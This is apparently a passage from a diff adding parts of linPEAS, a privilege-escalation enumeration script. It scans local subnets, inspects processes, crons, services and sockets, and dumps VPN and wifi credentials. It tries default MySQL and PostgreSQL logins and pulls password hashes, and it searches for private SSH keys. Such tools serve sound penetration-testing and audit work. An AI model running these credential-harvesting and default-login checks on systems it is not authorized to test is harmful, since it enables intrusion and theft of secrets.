discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp
sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips
rm $Wfolder/.ips.tmp 2>/dev/null
while read disc_ip; do
me=""
if [ "$disc_ip" = "$local_ip" ]; then
me=" (local)"
fi
echo "Scanning top ports of ${disc_ip}${me}"
(tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null
echo ""
done < $Wfolder/.ips
rm $Wfolder/.ips 2>/dev/null
echo ""
fi
done
fi
fi
if [ "$MACOS" ]; then
print_2title "Any MacOS Sharing Service Enabled?"
rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l);
scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l);
flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l);
rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l);
rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l);
bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l);
printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM";
echo ""
print_2title "VPN Creds"
system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED},"
echo ""
print_2title "Bluetooth Info"
warn_exec system_profiler SPBluetoothDataType
echo ""
print_2title "Ethernet Info"
warn_exec system_profiler SPEthernetDataType
echo ""
print_2title "USB Info"
warn_exec system_profiler SPUSBDataType
echo ""
fi

303
linPEAS/builder/linpeas_parts/procs_crons_timers_srvcs_sockets.sh Normal file
View File

@ -0,0 +1,303 @@
####################################################
#-----) Processes & Cron & Services & Timers (-----#
####################################################
#-- PCS) Cleaned proccesses
print_2title "Cleaned processes"
if [ "$NOUSEPS" ]; then
printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC
fi
print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes"
if [ "$NOUSEPS" ]; then
print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
pslist=$(print_ps)
else
(ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do
echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then
cpid=$(echo "$psline" | awk '{print $2}')
caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')"
if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then
printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g"
fi
fi
done
pslist=$(ps auxwww)
echo ""
#-- PCS) Binary processes permissions
print_2title "Binary processes permissions"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes"
binW="IniTialiZZinnggg"
ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do
if [ -w "$bpath" ]; then
binW="$binW|$bpath"
fi
done
ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v "$USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN},"
fi
echo ""
#-- PCS) Files opened by processes belonging to other users
if ! [ "$IAMROOT" ]; then
print_2title "Files opened by processes belonging to other users"
print_info "This is usually empty because of the lack of privileges to read other user processes information"
lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
echo ""
fi
#-- PCS) Processes with credentials inside memory
print_2title "Processes with credentials in memory (root req)"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory"
if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi
if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi
if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi
if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi
if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi
if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi
echo ""
#-- PCS) Different processes 1 min
if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then
print_2title "Different processes executed during 1 min (interesting is low number of repetitions)"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs"
temp_file=$(mktemp)
if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi
echo ""
fi
#-- PCS) Cron
print_2title "Cron jobs"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs"
command -v crontab 2>/dev/null || echo_not_found "crontab"
crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
command -v incrontab 2>/dev/null || echo_not_found "incrontab"
incrontab -l 2>/dev/null
ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g"
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
crontab -l -u "$USER" 2>/dev/null | tr -d "\r"
ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths
atq 2>/dev/null
echo ""
if [ "$MACPEAS" ]; then
print_2title "Third party LaunchAgents & LaunchDemons"
print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd"
ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null
echo ""
print_2title "Writable System LaunchAgents & LaunchDemons"
find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do
program=""
program=$(defaults read "$f" Program 2>/dev/null)
if ! [ "$program" ]; then
program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2)
fi
if [ -w "$program" ]; then
echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},";
fi
done
echo ""
print_2title "StartupItems"
print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items"
ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null
echo ""
print_2title "Login Items"
print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items"
osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null
echo ""
print_2title "SPStartupItemDataType"
system_profiler SPStartupItemDataType
echo ""
print_2title "Emond scripts"
print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond"
ls -l /private/var/db/emondClients
echo ""
fi
#-- PCS) Services
print_2title "Services"
print_info "Search for outdated versions"
(service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl"
echo ""
#-- PSC) systemd PATH
print_2title "Systemd PATH"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths"
systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g"
WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders")
echo ""
#-- PSC) .service files
#TODO: .service files in MACOS are folders
print_2title "Analyzing .service files"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services"
printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do
if [ ! -O "$s" ]; then #Remove services that belongs to the current user
if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then
echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
fi
servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths
printf "%s\n" "$servicebinpaths\n" | while read sp; do
if [ -w "$sp" ]; then
echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g"
fi
done
relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/")
relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/")
if [ "$relpath1" ] || [ "$relpath2" ]; then
if [ "$WRITABLESYSTEMDPATH" ]; then
echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},";
else
echo "$s is executing some relative path"
fi
fi
fi
done
if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi
echo ""
#-- PSC) Timers
print_2title "System timers"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers"
(systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found
echo ""
#-- PSC) .timer files
print_2title "Analyzing .timer files"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers"
printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do
if ! [ "$IAMROOT" ] && [ -w "$t" ]; then
echo "$t" | sed -${E} "s,.*,${SED_RED},g"
fi
timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2)
printf "%s\n" "$timerbinpaths" | while read tb; do
if [ -w "$tb" ]; then
echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g"
fi
done
#relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`"
#for rp in "$relpath"; do
# echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g"
#done
done
echo ""
#-- PSC) .socket files
#TODO: .socket files in MACOS are folders
if ! [ "$IAMROOT" ]; then
print_2title "Analyzing .socket files"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets"
printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do
if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then
echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g"
fi
socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
printf "%s\n" "$socketsbinpaths" | while read sb; do
if [ -w "$sb" ]; then
echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g"
fi
done
socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
printf "%s\n" "$socketslistpaths" | while read sl; do
if [ -w "$sl" ]; then
echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g";
fi
done
done
if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then
echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g"
fi
if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then
echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g"
fi
echo ""
print_2title "Unix Sockets Listening"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets"
# Search sockets using netstat and ss
unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1)
if ! [ "$unix_scks_list" ];then
unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+")
fi
if ! [ "$unix_scks_list" ];then
unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2)
fi
# But also search socket files
unix_scks_list2=$(find / -type s 2>/dev/null)
# Detele repeated dockets and check permissions
(printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do
perms=""
if [ -r "$l" ]; then
perms="Read "
fi
if [ -w "$l" ];then
perms="${perms}Write"
fi
if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g";
else
echo "$l" | sed -${E} "s,$l,${SED_RED},g"
echo " └─(${RED}${perms}${NC})"
# Try to contact the socket
socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null)
if [ $? -eq 0 ]; then
owner=$(ls -l "$s" | cut -d ' ' -f 3)
echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
echo "$socketcurl" | head -n 30
fi
fi
done
echo ""
fi
#-- PSC) Writable and weak policies in D-Bus config files
print_2title "D-Bus config files"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus"
if [ "$PSTORAGE_DBUS" ]; then
printf "%s\n" "$PSTORAGE_DBUS" | while read d; do
for f in $d/*; do
if ! [ "$IAMROOT" ] && [ -w "$f" ]; then
echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g"
fi
genpol=$(grep "<policy>" "$f" 2>/dev/null)
if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
#if [ "`grep \"<policy user=\\\"$USER\\\">\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi
userpol=$(grep "<policy user=" "$f" 2>/dev/null | grep -v "root")
if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
#for g in `groups`; do
# if [ "`grep \"<policy group=\\\"$g\\\">\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi
#done
grppol=$(grep "<policy group=" "$f" 2>/dev/null | grep -v "root")
if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
#TODO: identify allows in context="default"
done
done
fi
echo ""
print_2title "D-Bus Service Objects list"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus"
dbuslist=$(busctl list 2>/dev/null)
if [ "$dbuslist" ]; then
busctl list | while read line; do
echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},";
if ! echo "$line" | grep -qE "$dbuslistG"; then
srvc_object=$(echo $line | cut -d " " -f1)
srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ')
if [ "$srvc_object_info" ]; then
echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED},"
fi
fi
done
else echo_not_found "busctl"
fi

553
linPEAS/builder/linpeas_parts/software_information.sh Normal file
View File

@ -0,0 +1,553 @@
###########################################
#--------) Software Information (---------#
###########################################
#-- SI) Mysql version
print_2title "MySQL version"
mysql --version 2>/dev/null || echo_not_found "mysql"
echo ""
#-- SI) Mysql connection root/root
print_list "MySQL connection using default root/root ........... "
mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null)
if [ "$mysqlconnect" ]; then
echo "Yes" | sed -${E} "s,.*,${SED_RED},"
mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
else echo_no
fi
#-- SI) Mysql connection root/toor
print_list "MySQL connection using root/toor ................... "
mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null)
if [ "$mysqlconnect" ]; then
echo "Yes" | sed -${E} "s,.*,${SED_RED},"
mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
else echo_no
fi
#-- SI) Mysql connection root/NOPASS
mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null)
print_list "MySQL connection using root/NOPASS ................. "
if [ "$mysqlconnectnopass" ]; then
echo "Yes" | sed -${E} "s,.*,${SED_RED},"
mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
else echo_no
fi
#-- SI) Mysql credentials
print_2title "Searching mysql credentials and exec"
if [ "$PSTORAGE_MYSQL" ]; then
printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do
for f in $(find $d -name debian.cnf 2>/dev/null); do
if [ -r "$f" ]; then
echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED},"
cat "$f"
fi
done
for f in $(find $d -name user.MYD 2>/dev/null); do
if [ -r "$f" ]; then
echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED},"
grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password"
fi
done
for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do
if [ -r "$f" ]; then
u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null)
echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
fi
done
for f in $(find $d -name my.cnf 2>/dev/null); do
if [ -r "$f" ]; then
echo "Found readable $f"
grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED},"
fi
done
mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so")
if [ "$mysqlexec" ]; then
echo "Found $mysqlexec"
echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED},"
fi
done
else echo_not_found
fi
echo ""
peass{MariaDB}
peass{PostgreSQL}
#-- SI) PostgreSQL brute
if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it.
#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this
print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ "
if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
else echo_no
fi
print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ "
if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED},"
else echo_no
fi
print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... "
if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
else echo_no
fi
print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... "
if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
else echo_no
fi
echo ""
fi
peass{Mongo}
peass{Apache}
peass{Tomcat}
peass{FastCGI}
peass{Http_conf}
peass{Htpasswd}
peass{PHP Sessions}
peass{Wordpress}
peass{Drupal}
peass{Moodle}
peass{Supervisord}
peass{Cesi}
peass{Rsync}
peass{Hostapd}
#-- SI) Wifi conns
print_2title "Searching wifi conns file"
wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null)
if [ "$wifi" ]; then
printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done
else echo_not_found
fi
echo ""
peass{Anaconda ks}
peass{VNC}
peass{Ldap}
peass{OpenVPN}
#-- SI) ssh files
print_2title "Searching ssl/ssh files"
if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi
sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)"
hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)"
hostsallow="$(ls /etc/hosts.allow 2>/dev/null)"
peass{SSH}
grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED},"
if [ "$TIMEOUT" ]; then
privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null)
privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null)
privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null)
privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null)
else
privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout
privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null)
fi
if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then
echo ""
print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED},"
if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi
if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi
if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi
if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi
echo ""
fi
if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then
print_3title "Some certificates were found (out limited):"
printf "$certsb4_grep\n" | head -n 20
printf "$$PSTORAGE_CERTSBIN\n" | head -n 20
echo ""
fi
if [ "$PSTORAGE_CERTSCLIENT" ]; then
print_3title "Some client certificates were found:"
printf "$PSTORAGE_CERTSCLIENT\n"
echo ""
fi
if [ "$PSTORAGE_SSH_AGENTS" ]; then
print_3title "Some SSH Agent files were found:"
printf "$PSTORAGE_SSH_AGENTS\n"
echo ""
fi
if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then
print_3title "Listing SSH Agents"
ssh-add -l
echo ""
fi
if [ "$PSTORAGE_SSH_CONFIG" ]; then
print_3title "Some home ssh config file was found"
printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done
echo ""
fi
if [ "$hostsdenied" ]; then
print_3title "/etc/hosts.denied file found, read the rules:"
printf "$hostsdenied\n"
cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN},"
echo ""
fi
if [ "$hostsallow" ]; then
print_3title "/etc/hosts.allow file found, trying to read the rules:"
printf "$hostsallow\n"
cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED},"
echo ""
fi
if [ "$sshconfig" ]; then
echo ""
echo "Searching inside /etc/ssh/ssh_config for interesting info"
